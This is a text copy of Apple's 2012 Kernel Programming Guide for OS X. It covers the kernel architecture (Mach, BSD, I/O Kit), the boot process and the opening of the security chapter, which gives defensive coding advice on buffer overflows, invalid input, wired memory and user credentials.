Download the PDF at:

https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/KernelProgramming.pdf

Kernel Programming Guide

2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved.

Contents

About This Document
    Who Should Read This Document
    Road Map
    Other Apple Publications
    Mach API Reference
    Information on the Web
Keep Out
    Why You Should Avoid Programming in the Kernel
Kernel Architecture Overview
    Darwin
    Architecture
    Mach
    BSD
    I/O Kit
    Kernel Extensions
The Early Boot Process
    Boot ROM
    The Boot Loader
    Rooting
Security Considerations
    Security Implications of Paging
    Buffer Overflows and Invalid Input
    User Credentials
    Basic User Credentials
    Access Control Lists
    Remote Authentication
    One-Time Pads
    Time-based authentication
    Temporary Files
    /dev/mem and /dev/kmem
    Key-based Authentication and Encryption
    Public Key Weaknesses
    Using Public Keys for Message Exchange
    Using Public Keys for Identity Verification
    Using Public Keys for Data Integrity Checking
    Encryption Summary
    Console Debugging
    Code Passing
Performance Considerations
    Interrupt Latency
    Locking Bottlenecks
    Working With Highly Contended Locks
    Reducing Contention by Decreasing Granularity
    Code Profiling
    Using Counters for Code Profiling
    Lock Profiling
Kernel Programming Style
    C++ Naming Conventions
    Basic Conventions
    Additional Guidelines
    Standard C Naming Conventions
    Commonly Used Functions
    Performance and Stability Tips
    Performance and Stability Tips
    Stability Tips
    Style Summary
Mach Overview
    Mach Kernel Abstractions
    Tasks and Threads
    Ports, Port Rights, Port Sets, and Port Namespaces
    Memory Management
    Interprocess Communication (IPC)
    IPC Transactions and Event Dispatching
    Message Queues
    Semaphores
    Notifications
    Locks
    Remote Procedure Call (RPC) Objects
    Time Management
Memory and Virtual Memory
    OS X VM Overview
    Memory Maps Explained
    Named Entries
    Universal Page Lists (UPLs)
    Using Mach Memory Maps
    Other VM and VM-Related Subsystems
    Pagers
    Working Set Detection Subsystem
    VM Shared Memory Server Subsystem
    Address Spaces
    Background Info on PCI Address Translation
    IOMemoryDescriptor Changes
    VM System and pmap Changes:
    Kernel Dependency Changes
    Summary
    Allocating Memory in the Kernel
    Allocating Memory From a Non-I/O-Kit Kernel Extension
    Allocating Memory From the I/O Kit
    Allocating Memory In the Kernel Itself
Mach Scheduling and Thread Interfaces
    Overview of Scheduling
    Why Did My Thread Priority Change?
    Using Mach Scheduling From User Applications
    Using the pthreads API to Influence Scheduling
    Using the Mach Thread API to Influence Scheduling
    Using the Mach Task API to Influence Scheduling
    Kernel Thread APIs
    Creating and Destroying Kernel Threads
    SPL and Friends
    Wait Queues and Wait Primitives
Bootstrap Contexts
    How Contexts Affect Users
    How Contexts Affect Developers
I/O Kit Overview
    Redesigning the I/O Model
    I/O Kit Architecture
    Families
    Drivers
    Nubs
    Connection Example
    For More Information
BSD Overview
    BSD Facilities
    Differences between OS X and BSD
    For Further Reading
File Systems Overview
    Working With the File System
    VFS Transition
Network Architecture
Boundary Crossings
    Security Considerations
    Choosing a Boundary Crossing Method
    Kernel Subsystems
    Bandwidth and Latency
    Mach Messaging and Mach Interprocess Communication (IPC)
    Using Well-Defined Ports
    Remote Procedure Calls (RPC)
    Calling RPC From User Applications
    BSD syscall API
    BSD ioctl API
    BSD sysctl API
    General Information on Adding a sysctl
    Adding a sysctl Procedure Call
    Registering a New Top Level sysctl
    Adding a Simple sysctl
    Calling a sysctl From User Space
    Memory Mapping and Block Copying
    Summary
Synchronization Primitives
    Semaphores
    Condition Variables
    Locks
    Spinlocks
    Mutexes
    Read-Write Locks
    Spin/Sleep Locks
    Using Lock Functions
Miscellaneous Kernel Services
    Using Kernel Time Abstractions
    Obtaining Time Information
    Event and Timer Waits
    Handling Version Dependencies
    Boot Option Handling
    Queues
    Installing Shutdown Hooks
Kernel Extension Overview
    Implementation of a Kernel Extension (KEXT)
    Kernel Extension Dependencies
    Building and Testing Your Extension
    Debugging Your KEXT
    Installed KEXTs
Building and Debugging Kernels
    Adding New Files or Modules
    Modifying the Configuration Files
    Modifying the Source Code Files
    Building Your First Kernel
    Building an Alternate Kernel Configuration
    When Things Go Wrong: Debugging the Kernel
    Setting Debug Flags in Open Firmware
    Avoiding Watchdog Timer Problems
    Choosing a Debugger
    Using gdb for Kernel Debugging
    Using ddb for Kernel Debugging
Bibliography
    Apple OS X Publications
    General UNIX and Open Source Resources
    BSD and UNIX Internals
    Mach
    Networking
    Operating Systems
    POSIX
    Programming
    Websites and Online Resources
    Security and Cryptography
Document Revision History
Glossary

Figures, Tables, and Listings

Kernel Architecture Overview
    Figure 3-1 OS X architecture
    Figure 3-2 Darwin and OS X
    Figure 3-3 OS X kernel architecture
Kernel Programming Style
    Table 7-1 Commonly used C functions
Mach Scheduling and Thread Interfaces
    Table 10-1 Thread priority bands
    Table 10-2 Thread policies
    Table 10-3 Task roles
I/O Kit Overview
    Figure 12-1 I/O Kit architecture
Synchronization Primitives
    Listing 17-1 Allocating lock attributes and groups (lifted liberally from kern_time.c)
Building and Debugging Kernels
    Table 20-1 Debugging flags
    Table 20-2 Switch options in ddb

About This Document

The purpose of this document is to provide fundamental high-level information about the OS X core operating-system architecture. It also provides background for system programmers and developers of device drivers, file systems, and network extensions. In addition, it goes into detail about topics of interest to kernel programmers as a whole.

This is not a document on drivers. It covers device drivers at a high level only. It does, however, cover some areas of interest to driver writers, such as crossing the user-kernel boundary. If you are writing device drivers, you should primarily read the document I/O Kit Fundamentals, but you may still find this document helpful as background reading.

Who Should Read This Document

This document has a wide and diverse audience, specifically the set of potential system software developers for OS X, including the following sorts of developers:

● device-driver writers
● network-extension writers
● file-system writers
● developers of software that modifies file system data on the fly
● system programmers familiar with BSD, Linux, and similar operating systems
● developers who want to learn about kernel programming

If you fall into one of these categories, you may find this document helpful.
It is important to stress the care needed when writing code that resides in the kernel, however, as noted in “Keep Out”.

Road Map

The goal of this document is to describe the various major components of OS X at a conceptual level, then provide more detailed programming information for developers working in each major area. It is divided into several parts.

The first part is a kernel programming overview, which discusses programming guidelines that apply to all aspects of kernel programming. This includes issues such as security, SMP safety, style, performance, and the OS X kernel architecture as a whole. This part contains the chapters “Keep Out”, “Kernel Architecture Overview”, “The Early Boot Process”, “Security Considerations”, “Performance Considerations”, and “Kernel Programming Style”.

The next part describes Mach and the bootstrap task, including information about IPC, bootstrap contexts, ports and port rights, and so on. This includes the chapters “Mach Overview”, “Memory and Virtual Memory”, “Mach Scheduling and Thread Interfaces”, and “Bootstrap Contexts”.

The third part describes the I/O Kit and BSD. The I/O Kit is described at only a high level, since it is primarily of interest to driver developers. The BSD subsystem is covered in more detail, including descriptions of BSD networking and file systems. This includes the chapters “I/O Kit Overview”, “BSD Overview”, “File Systems Overview”, and “Network Architecture”.

The fourth part describes kernel services, including boundary crossings, synchronization, queues, clocks, timers, shutdown hooks, and boot option handling. This includes the chapters “Boundary Crossings”, “Synchronization Primitives”, and “Miscellaneous Kernel Services”.

The fifth part explains how to build and debug the kernel and kernel extensions. This includes the chapters “Kernel Extension Overview” and “Building and Debugging Kernels”.

Each part begins with an overview chapter or chapters, followed by chapters that address particular areas of interest.

The document ends with a glossary of terms used throughout the preceding chapters as well as a bibliography which provides numerous pointers to other reference materials. Glossary terms are highlighted in bold when first used. While most terms are defined when they first appear, the definitions are all in the glossary for convenience. If a term seems familiar, it probably means what you think it does. If it’s unfamiliar, check the glossary. In any case, all readers may want to skim through the glossary, in case there are subtle differences between OS X usage and that of other operating systems.

The goal of this document is very broad, providing a firm grounding in the fundamentals of OS X kernel programming for developers from many backgrounds. Due to the complex nature of kernel programming and limitations on the length of this document, however, it is not always possible to provide introductory material for developers who do not have at least some background in their area of interest. It is also not possible to cover every detail of certain parts of the kernel. If you run into problems, you should join the appropriate Darwin discussion list and ask questions. You can find the lists at http://www.lists.apple.com/.

Because introductory material is limited here, the bibliography contains high-level references that should help familiarize you with some of the basic concepts that you need to fully understand the material in this document.

This document is, to a degree, a reference document.
The introductory sections should be easy to read, and we recommend that you read them to gain a general understanding of each topic. Likewise, the first part of each chapter, and in many cases of sections within chapters, is tailored to provide a general understanding of individual topics. However, you should not plan to read this document cover to cover; instead, take note of topics of interest so that you can refer back to them when the need arises.

Other Apple Publications

This document, Kernel Programming, is part of the Apple Reference Library. Be sure to read the first document in the series, Mac Technology Overview, if you are not familiar with OS X. You can obtain other documents from the Apple Developer Documentation website at http://developer.apple.com/documentation.

Mach API Reference

If you plan to do extensive work inside the OS X kernel, you may find it convenient to have a complete Mach API reference, since this document covers only the most common and useful portions of the Mach API. To better understand certain interfaces, it may also help to study the implementations that led up to those used in OS X, particularly to fill in gaps in understanding of the fundamental principles of the implementation.

OS X is based on the Mach 3.0 microkernel, designed by Carnegie Mellon University, and later adapted to the Power Macintosh by Apple and the Open Software Foundation Research Institute (now part of Silicomp). This was known as osfmk, and was part of MkLinux (http://www.mklinux.org). Later, this and code from OSF’s commercial development efforts were incorporated into Darwin’s kernel. Throughout this evolutionary process, the Mach APIs used in OS X diverged in many ways from the original CMU Mach 3 APIs.

You may find older versions of the Mach source code interesting, both to satisfy historical curiosity and to avoid remaking mistakes made in earlier implementations.
MkLinux maintains an active CVS repository with their recent versions of Mach kernel source code. Older versions can be obtained through various Internet sites. You can also find CMU Mach white papers by searching for Mach on the CMU computer science department’s website (http://www.cs.cmu.edu), along with various source code samples.

Up-to-date versions of the Mach 3 APIs that OS X provides are described in the Mach API reference in the kernel sources. The kernel sources can be found in the xnu project on http://kernel.macosforge.org/.

Information on the Web

Apple maintains several websites where developers can go for general and technical information on OS X.

● Apple Developer Connection: Developer Documentation (http://developer.apple.com/documentation). Features the same documentation that is installed on OS X, except that often the documentation is more up-to-date. Also includes legacy documentation.
● Apple Developer Connection: OS X (http://developer.apple.com/devcenter/mac/). Offers SDKs, release notes, product notes and news, and other resources and information related to OS X.
● AppleCare Tech Info Library (http://www.apple.com/support/). Contains technical articles, tutorials, FAQs, technical notes, and other information.

Keep Out

This document assumes a broad general understanding of kernel programming concepts. There are many good introductory operating systems texts. This is not one of them. For more information on basic operating systems programming, you should consider the texts mentioned in the bibliography at the end of this document.

Many developers are justifiably cautious about programming in the kernel. A decision to program in the kernel is not to be taken lightly.
Kernel programmers have a responsibility to users that greatly surpasses that of programmers who write user programs.

Why You Should Avoid Programming in the Kernel

Kernel code must be nearly perfect. A bug in the kernel could cause random crashes, data corruption, or even render the operating system inoperable. It is even possible for certain errant operations to cause permanent and irreparable damage to hardware, for example, by disabling the cooling fan and running the CPU full tilt.

Kernel programming is a black art that should be avoided if at all possible. Fortunately, kernel programming is usually unnecessary. You can write most software entirely in user space. Even most device drivers (FireWire and USB, for example) can be written as applications, rather than as kernel code. A few low-level drivers must be resident in the kernel's address space, however, and this document might be marginally useful if you are writing drivers that fall into this category.

Despite parts of this document being useful in driver writing, this is not a document about writing drivers. In OS X, you write device drivers using the I/O Kit. While this document covers the I/O Kit at a conceptual level, the details of I/O Kit programming are beyond the scope of this document. Driver writers are encouraged to read I/O Kit Fundamentals for detailed information about the I/O Kit.

This document covers most aspects of kernel programming with the exception of device drivers. Covered topics include scheduling, virtual memory pagers and policies, Mach IPC, file systems, networking protocol stacks, process and thread management, kernel security, synchronization, and a number of more esoteric topics.

To summarize, kernel programming is an immense responsibility.
You must be exceptionally careful to ensure that your code does not cause the system to crash, does not provide any unauthorized user access to someone else’s files or memory, does not introduce remote or local root exploits, and does not cause inadvertent data loss or corruption.

Kernel Architecture Overview

OS X provides many benefits to the Macintosh user and developer communities. These benefits include improved reliability and performance, enhanced networking features, an object-based system programming interface, and increased support for industry standards.

In creating OS X, Apple has completely re-engineered the Mac OS core operating system. Forming the foundation of OS X is the kernel. Figure 3-1 (page 14) illustrates the OS X architecture.

Figure 3-1 OS X architecture
[Diagram not reproduced. Labels: Application environment (Classic, Carbon, Cocoa, Java (JDK), BSD), Application Services, QuickTime, Core Services, Kernel environment.]

The kernel provides many enhancements for OS X. These include preemption, memory protection, enhanced performance, improved networking facilities, support for both Macintosh (Extended and Standard) and non-Macintosh (UFS, ISO 9660, and so on) file systems, object-oriented APIs, and more. Two of these features, preemption and memory protection, lead to a more robust environment.

In Mac OS 9, applications cooperate to share processor time. Similarly, all applications share the memory of the computer among them. Mac OS 9 is a cooperative multitasking environment. The responsiveness of all processes is compromised if even a single application doesn’t cooperate. On the other hand, real-time applications such as multimedia need to be assured of predictable, time-critical behavior.

In contrast, OS X is a preemptive multitasking environment. In OS X, the kernel provides enforcement of cooperation, scheduling processes to share time (preemption). This supports real-time behavior in applications that require it.
In OS X, processes do not normally share memory. Instead, the kernel assigns each process its own address space, controlling access to these address spaces. This control ensures that no application can inadvertently access or modify another application’s memory (protection). Size is not an issue; with the virtual memory system included in OS X, each application has access to its own 4 GB address space.

Viewed together, all applications are said to run in user space, but this does not imply that they share memory. User space is simply a term for the combined address spaces of all user-level applications. The kernel itself has its own address space, called kernel space. In OS X, no application can directly modify the memory of the system software (the kernel).

Although user processes do not share memory by default, as they did in Mac OS 9, communication (and even memory sharing) between applications is still possible. For example, the kernel offers a rich set of primitives to permit some sharing of information among processes. These primitives include shared libraries, frameworks, and POSIX shared memory. Mach messaging provides another approach, handing memory from one process to another. Unlike Mac OS 9, however, memory sharing cannot occur without explicit action by the programmer.

Darwin

The OS X kernel is an Open Source project. The kernel, along with other core parts of OS X, are collectively referred to as Darwin. Darwin is a complete operating system based on many of the same technologies that underlie OS X. However, Darwin does not include Apple’s proprietary graphics or applications layers, such as Quartz, QuickTime, Cocoa, Carbon, or OpenGL.

Figure 3-2 (page 15) shows the relationship between Darwin and OS X.
Both build upon the same kernel, but OS X adds Core Services, Application Services and QuickTime, as well as the Classic, Carbon, Cocoa, and Java (JDK) application environments. Both Darwin and OS X include the BSD command-line application environment; however, in OS X, use of this environment is not required, and thus it is hidden from the user unless they choose to access it.

Figure 3-2 Darwin and OS X
[Diagram not reproduced. Labels: Application environment (Classic, Carbon, Cocoa, Java (JDK), BSD), Application Services, QuickTime, Core Services, Kernel environment.]

Darwin technology is based on BSD, Mach 3.0, and Apple technologies. Best of all, Darwin technology is Open Source technology, which means that developers have full access to the source code. In effect, OS X third-party developers can be part of the Darwin core system software development team. Developers can also see how Apple is doing things in the core operating system and adopt (or adapt) code to use within their own products. Refer to the Apple Public Source License (APSL) for details.

Because the same software forms the core of both OS X and Darwin, developers can create low-level software that runs on both OS X and Darwin with few, if any, changes. The only difference is likely to be in the way the software interacts with the application environment.

Darwin is based on proven technology from many sources. A large portion of this technology is derived from FreeBSD, a version of 4.4BSD that offers advanced networking, performance, security, and compatibility features. Other parts of the system software, such as Mach, are based on technology previously used in Apple’s MkLinux project, in OS X Server, and in technology acquired from NeXT. Much of the code is platform-independent. All of the core operating-system code is available in source form.

The core technologies have been chosen for several reasons.
Mach provides a clean set of abstractions for dealing with memory management, interprocess (and interprocessor) communication (IPC), and other low-level operating-system functions. In today’s rapidly changing hardware environment, this provides a useful layer of insulation between the operating system and the underlying hardware.

BSD is a carefully engineered, mature operating system with many capabilities. In fact, most of today’s commercial UNIX and UNIX-like operating systems contain a great deal of BSD code. BSD also provides a set of industry-standard APIs.

New technologies, such as the I/O Kit and Network Kernel Extensions (NKEs), have been designed and engineered by Apple to take advantage of advanced capabilities, such as those provided by an object-oriented programming model.

OS X combines these new technologies with time-tested industry standards to create an operating system that is stable, reliable, flexible, and extensible.

Architecture

The foundation layer of Darwin and OS X is composed of several architectural components, as shown in Figure 3-3 (page 16). Taken together, these components form the kernel environment.

Figure 3-3 OS X kernel architecture
[Diagram not reproduced. Labels: Application environments, Common services, Kernel environment, Mach, BSD, File system, Networking, NKE, Drivers, I/O Kit.]

Important: Note that OS X uses the term kernel somewhat differently than you might expect.

“A kernel, in traditional operating-system terminology, is a small nucleus of software that provides only the minimal facilities necessary for implementing additional operating-system services.” (From The Design and Implementation of the 4.4BSD Operating System, McKusick, Bostic, Karels, and Quarterman, 1996.)

Similarly, in traditional Mach-based operating systems, the kernel refers to the Mach microkernel and ignores additional low-level code without which Mach does very little.
In OS X, however, the kernel environment contains much more than the Mach kernel itself. The OS X kernel environment includes the Mach kernel, BSD, the I/O Kit, file systems, and networking components. These are often referred to collectively as the kernel. Each of these components is described briefly in the following sections. For further details, refer to the specific component chapters or to the reference material listed in the bibliography.

Because OS X contains three basic components (Mach, BSD, and the I/O Kit), there are also frequently as many as three APIs for certain key operations. In general, the API chosen should match the part of the kernel where it is being used, which in turn is dictated by what your code is attempting to do. The remainder of this chapter describes Mach, BSD, and the I/O Kit and outlines the functionality that is provided by those components.

Mach

Mach manages processor resources such as CPU usage and memory, handles scheduling, provides memory protection, and provides a messaging-centered infrastructure to the rest of the operating-system layers. The Mach component provides

● untyped interprocess communication (IPC)
● remote procedure calls (RPC)
● scheduler support for symmetric multiprocessing (SMP)
● support for real-time services
● virtual memory support
● support for pagers
● modular architecture

General information about Mach may be found in the chapter “Mach Overview” (page 53). Information about scheduling can be found in the chapter “Mach Scheduling and Thread Interfaces” (page 77). Information about the VM system can be found in “Memory and Virtual Memory” (page 61).

BSD

Above the Mach layer, the BSD layer provides “OS personality” APIs and services. The BSD layer is based on the BSD kernel, primarily FreeBSD.
The BSD component provides

● file systems
● networking (except for the hardware device level)
● UNIX security model
● syscall support
● the BSD process model, including process IDs and signals
● FreeBSD kernel APIs
● many of the POSIX APIs
● kernel support for pthreads (POSIX threads)

The BSD component is described in more detail in the chapter “BSD Overview” (page 101).

Networking

OS X networking takes advantage of BSD’s advanced networking capabilities to provide support for modern features, such as Network Address Translation (NAT) and firewalls. The networking component provides

● 4.4BSD TCP/IP stack and socket APIs
● support for both IP and DDP (AppleTalk transport)
● multihoming
● routing
● multicast support
● server tuning
● packet filtering
● Mac OS Classic support (through filters)

More information about networking may be found in the chapter “Network Architecture” (page 108).

File Systems

OS X provides support for numerous types of file systems, including HFS, HFS+, UFS, NFS, ISO 9660, and others. The default file-system type is HFS+; OS X boots (and “roots”) from HFS+, UFS, ISO, NFS, and UDF. Advanced features of OS X file systems include an enhanced Virtual File System (VFS) design. VFS provides for a layered architecture (file systems are stackable). The file system component provides

● UTF-8 (Unicode) support
● increased performance over previous versions of Mac OS.

More information may be found in the chapter “File Systems Overview” (page 106).

I/O Kit

The I/O Kit provides a framework for simplified driver development, supporting many categories of devices. The I/O Kit features an object-oriented I/O architecture implemented in a restricted subset of C++. The I/O Kit framework is both modular and extensible.
The I/O Kit component provides

● true plug and play
● dynamic device management
● dynamic (“on-demand”) loading of drivers
● power management for desktop systems as well as portables
● multiprocessor capabilities

The I/O Kit is described in greater detail in the chapter “I/O Kit Overview” (page 94).

Kernel Extensions

OS X provides a kernel extension mechanism as a means of allowing dynamic loading of pieces of code into kernel space, without the need to recompile. These pieces of code are known generically as plug-ins or, in the OS X kernel environment, as kernel extensions or KEXTs.

Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to interfaces that are not exported to user space. Many of the components of the kernel environment support this extension mechanism, though they do so in different ways.

For example, some of the new networking features involve the use of network kernel extensions (NKEs). These are discussed in the chapter “Network Architecture” (page 108).

The ability to dynamically add a new file-system implementation is based on VFS KEXTs. Device drivers and device families in the I/O Kit are implemented using KEXTs. KEXTs make development much easier for developers writing drivers or those writing code to support a new volume format or networking protocol. KEXTs are discussed in more detail in the chapter “Kernel Extension Overview” (page 150).

The Early Boot Process

Boot ROM

When the power to a Macintosh computer is turned on, the BootROM firmware is activated. BootROM (which is part of the computer’s hardware) has two primary responsibilities: it initializes system hardware and it selects an operating system to run.
BootROM has two components to help it carry out these functions:

● POST (Power-On Self Test) initializes some hardware interfaces and verifies that sufficient memory is available and in a good state.
● EFI does basic hardware initialization and selects which operating system to use.

If multiple installations of OS X are available, BootROM chooses the one that was last selected by the Startup Disk System Preference. The user can override this choice by holding down the Option key while the computer boots, which causes EFI to display a screen for choosing the boot volume.

The Boot Loader

Once BootROM is finished and an OS X partition has been selected, control passes to the boot.efi boot loader. The principal job of this boot loader is to load the kernel environment. As it does this, the boot loader draws the “booting” image on the screen.

If full-disk encryption is enabled, the boot loader is responsible for drawing the login UI and prompting for the user’s password, which is needed to access the encrypted disk to boot from it. (This UI is drawn by loginwindow otherwise.)

In the simplest case, the boot loader can be found in the /System/Library/CoreServices directory on the root partition, in a file named boot.efi.

Note: Booting from a UFS volume is deprecated as of OS X v10.5.

In order to speed up boot time, the boot loader uses several caches. The contents and location of these caches vary between versions of OS X, but knowing some details about the caching may be helpful when debugging kernel extensions.

After you install or modify a kernel extension, touch the /System/Library/Extensions directory; the system rebuilds the caches automatically.

Important: You should not depend on the implementation details of the kernel caches in your software.

In OS X v10.7, the boot loader looks for the unified prelinked kernel.
This cache contains all kernel extensions that may be needed to boot a Mac with any hardware configuration, with the extensions already linked against the kernel. It is located at /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.

In OS X v10.6 and earlier, the boot loader first looks for the prelinked kernel (also called the kernel cache). This cache contains exactly the set of kernel extensions that were needed during the previous system startup, already linked against the kernel. If the prelinked kernel is missing or unusable (for example, because a hardware configuration has changed), the booter looks for the mkext cache, which contains all kernel extensions that may be needed to boot the system. Using the mkext cache is much slower because the linker must be run. On OS X v10.5 and v10.6, these caches are located in /System/Library/Caches/com.apple.kext.caches/Startup/; on previous versions of OS X, they were located at /System/Library/Caches/com.apple.kernelcaches/.

Finally, if the caches cannot be used, the boot loader searches /System/Library/Extensions for drivers and other kernel extensions whose OSBundleRequired property is set to a value appropriate to the type of boot (for example, local or network boot). This process is very slow, because the Info.plist file of every kernel extension must be parsed, and then the linker must be run.

For more information on how drivers are loaded, see I/O Kit Fundamentals, the manual page for kextcache, and Kernel Extension Programming Topics.

Rooting

Once the kernel and all drivers necessary for booting are loaded, the boot loader starts the kernel’s initialization procedure. At this point, enough drivers are loaded for the kernel to find the root device.

The kernel initializes the Mach and BSD data structures and then initializes the I/O Kit. The I/O Kit links the loaded drivers into the kernel, using the device tree to determine which drivers to link.
Once the kernel finds the root device, it roots(*) BSD off of it.

Note: As a terminology aside, the term “boot” was historically reserved for loading a bootstrap loader and kernel off of a disk or partition. In more recent years, the usage has evolved to allow a second meaning: the entire process from initial bootstrap until the OS is generally usable by an end user. In this case, the term is used according to the former meaning. As used here, the term “root” refers to mounting a partition as the root, or top-level, filesystem. Thus, while the OS boots off of the root partition, the kernel roots the OS off of the partition before executing startup scripts from it.

Boot≠Root is a technology that allows the system to boot from a partition other than the root partition. This is used to boot systems where the root partition is encrypted using full-disk encryption, or where the root partition is located on a device which requires additional drivers (such as a RAID array). Boot≠Root uses a helper partition to store the files needed to boot, such as the kernel cache. For more information on how to set up the property in a filter-scheme driver, see “Developing a Filter Scheme” in Mass Storage Device Driver Programming Guide.

Security Considerations

Kernel-level security can mean many things, depending on what kind of kernel code you are writing. This chapter points out some common security issues at the kernel or near-kernel level and, where applicable, describes ways to avoid them.
These issues are covered in the following sections:

● “Security Implications of Paging” (page 25)
● “Buffer Overflows and Invalid Input” (page 26)
● “User Credentials” (page 27)
● “Remote Authentication” (page 29)
● “Temporary Files” (page 31)
● “/dev/mem and /dev/kmem” (page 31)
● “Key-based Authentication and Encryption” (page 32)
● “Console Debugging” (page 36)
● “Code Passing” (page 37)

Many of these issues are also relevant for application programming, but are crucial for programmers working in the kernel. Others are special considerations that application programmers might not expect or anticipate.

Note: The terms cleartext and plaintext both refer to unencrypted text. These terms can generally be used interchangeably, although in some circles, the term cleartext is restricted to unencrypted transmission across a network. However, in other circles, the term plaintext (or sometimes plain text) refers to plain ASCII text (as opposed to HTML or rich text). To avoid any potential confusion, this chapter will use the term cleartext to refer to unencrypted text.

In order to understand security in OS X, it is important to understand that there are two security models at work. One of these is the kernel security model, which is based on users, groups, and very basic per-user and per-group rights, which are, in turn, coupled with access control lists for increased flexibility. The other is a user-level security model, which is based on keys, keychains, groups, users, password-based authentication, and a host of other details that are beyond the scope of this document.

The user level of security contains two basic features that you should be aware of as a kernel programmer: Security Server and Keychain Manager.
The Security Server consists of a daemon and various access libraries for caching permission to do certain tasks, based upon various means of authentication, including passwords and group membership. When a program requests permission to do something, the Security Server basically says “yes” or “no,” and caches that decision so that further requests from that user (for similar actions within a single context) do not require reauthentication for a period of time.

The Keychain Manager is a daemon that provides services related to the keychain, a central repository for a user’s encryption/authentication keys. For more high-level information on keys, see “Key-based Authentication and Encryption” (page 32).

The details of the user-level security model are far beyond the scope of this document. However, if you are writing an application that requires services of this nature, you should consider taking advantage of the Security Server and Keychain Manager from the user-space portion of your application, rather than attempting equivalent services in the kernel. More information about these services can be found on Apple’s Developer Documentation website at http://developer.apple.com/documentation.

Security Implications of Paging

Paging has long been a major problem for security-conscious programmers. If you are writing a program that does encryption, the existence of even a small portion of the cleartext of a document in a backing store could be enough to reduce the complexity of breaking that encryption by orders of magnitude.

Indeed, many types of data, such as hashes, unencrypted versions of sensitive data, and authentication tokens, should generally not be written to disk due to the potential for abuse. This raises an interesting problem. There is no good way to deal with this in user space (unless a program is running as root). However, for kernel code, it is possible to prevent pages from being written out to a backing store.
This process is referred to as “wiring down” memory, and is described further in “Memory Mapping and Block Copying” (page 125).

The primary purpose of wired memory is to allow DMA-based I/O. Since hardware DMA controllers generally do not understand virtual addressing, information used in I/O must be physically in memory at a particular location and must not move until the I/O operation is complete. This mechanism can also be used to prevent sensitive data from being written to a backing store.

Because wired memory can never be paged out (until it is unwired), wiring large amounts of memory has drastic performance repercussions, particularly on systems with small amounts of memory. For this reason, you should take care not to wire down memory indiscriminately and only wire down memory if you have a very good reason to do so.

In OS X, you can wire down memory at allocation time or afterwards. To wire memory at allocation time:

● In I/O Kit, call IOMalloc and IOFree to allocate and free wired memory.
● In other kernel extensions, call OSMalloc and OSFree and pass a tag type whose flags are set to OSMT_DEFAULT.
● In user space code, allocate page-sized quantities with your choice of API, and then call mlock(2) to wire them.
● Inside the kernel itself (not in kernel extensions), you can also use kmem_alloc and related functions.

For more information on wired memory, see “Memory Mapping and Block Copying” (page 125).

Buffer Overflows and Invalid Input

Buffer overflows are one of the more common bugs in both application and kernel programming. The most common cause is failing to allocate space for the null character that terminates a string in C or C++. However, user input can also cause buffer overflows if fixed-size input buffers are used and appropriate care is not taken to prevent overflowing these buffers.
The most obvious protection, in this case, is the best one. Either don’t use fixed-length buffers or add code to reject or truncate input that overflows the buffer. The implementation details in either case depend on the type of code you are writing.

For example, if you are working with strings and truncation is acceptable, instead of using strcpy, you should use strlcpy to limit the amount of data to copy. OS X provides length-limited versions of a number of string functions, including strlcpy, strlcat, strncmp, snprintf, and vsnprintf.

If truncation of data is not acceptable, you must explicitly call strlen to determine the length of the input string and return an error if it exceeds the maximum length (one less than the buffer size).

Other types of invalid input can be somewhat harder to handle, however. As a general rule, you should be certain that switch statements have a default case unless you have listed every legal value for the width of the type.

A common mistake is assuming that listing every possible value of an enum type provides protection. An enum is generally implemented as either a char or an int internally. A careless or malicious programmer could easily pass any value to a kernel function, including those not explicitly listed in the type, simply by using a different prototype that defines the parameter as, for example, an int.

Another common mistake is to assume that you can dereference a pointer passed to your function by another function. You should always check for null pointers before dereferencing them. Starting a function with

    int do_something(bufptr *bp, int flags) {
        char *token = bp->b_data;

is the surest way to guarantee that someone else will pass in a null buffer pointer, either maliciously or because of programmer error. In a user program, this is annoying. In a file system, it is devastating.
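The checks described in this section can be sketched in portable user-space C. This is only an illustration under stated assumptions, not kernel code: the names copy_or_reject, copy_truncate, request_kind, and handle_request are hypothetical, and snprintf stands in for strlcpy in the truncating path because strlcpy is not available in every C library.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper for the "truncation is not acceptable" case:
 * copy src into dst only if it fits, otherwise return an error. */
static int copy_or_reject(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return EINVAL;              /* check pointers before dereferencing */

    size_t len = strlen(src);
    if (len > dst_size - 1)         /* maximum length is buffer size minus one */
        return ENAMETOOLONG;

    memcpy(dst, src, len + 1);      /* len + 1 copies the terminating null */
    return 0;
}

/* Hypothetical helper for the "truncation is acceptable" case.
 * Returns 1 if the input was truncated, 0 if it fit, -1 on bad arguments. */
static int copy_truncate(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    /* snprintf never writes more than dst_size bytes and always terminates. */
    int needed = snprintf(dst, dst_size, "%s", src);
    if (needed < 0)
        return -1;
    return (size_t)needed >= dst_size;
}

/* Hypothetical request codes, for illustration only. */
enum request_kind { REQ_READ = 0, REQ_WRITE = 1 };

/* The parameter is an int on purpose: a caller can pass any value,
 * so the default case rejects everything that is not listed. */
static int handle_request(int kind)
{
    switch (kind) {
    case REQ_READ:
        return 0;
    case REQ_WRITE:
        return 0;
    default:
        return EINVAL;
    }
}
```

With an 8-byte buffer, copy_or_reject accepts a 7-character string and rejects an 8-character one, while copy_truncate keeps the first 7 characters of a longer input and reports that truncation occurred.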
Security is particularly important for kernel code that draws input from a network. Assumptions about packet size are frequently the cause of security problems. Always watch for packets that are too big and handle them in a reasonable way. Likewise, always verify checksums on packets. This can help you determine if a packet was modified, damaged, or truncated in transit, though it is far from foolproof. If the validity of data from a network is of vital importance, you should use remote authentication, signing, and encryption mechanisms such as those described in “Remote Authentication” (page 29) and “Key-based Authentication and Encryption” (page 32).

User Credentials

As described in the introduction to this chapter, OS X has two different means of authenticating users. The user-level security model (including the Keychain Manager and the Security Server) is beyond the scope of this document. The kernel security model, however, is of greater interest to kernel developers, and is much more straightforward than the user-level model.

The kernel security model is based on two mechanisms: basic user credentials and ACL permissions. The first, basic user credentials, are passed around within the kernel to identify the current user and group of the calling process. The second authentication mechanism, access control lists (ACLs), provides access control at a finer level of granularity.

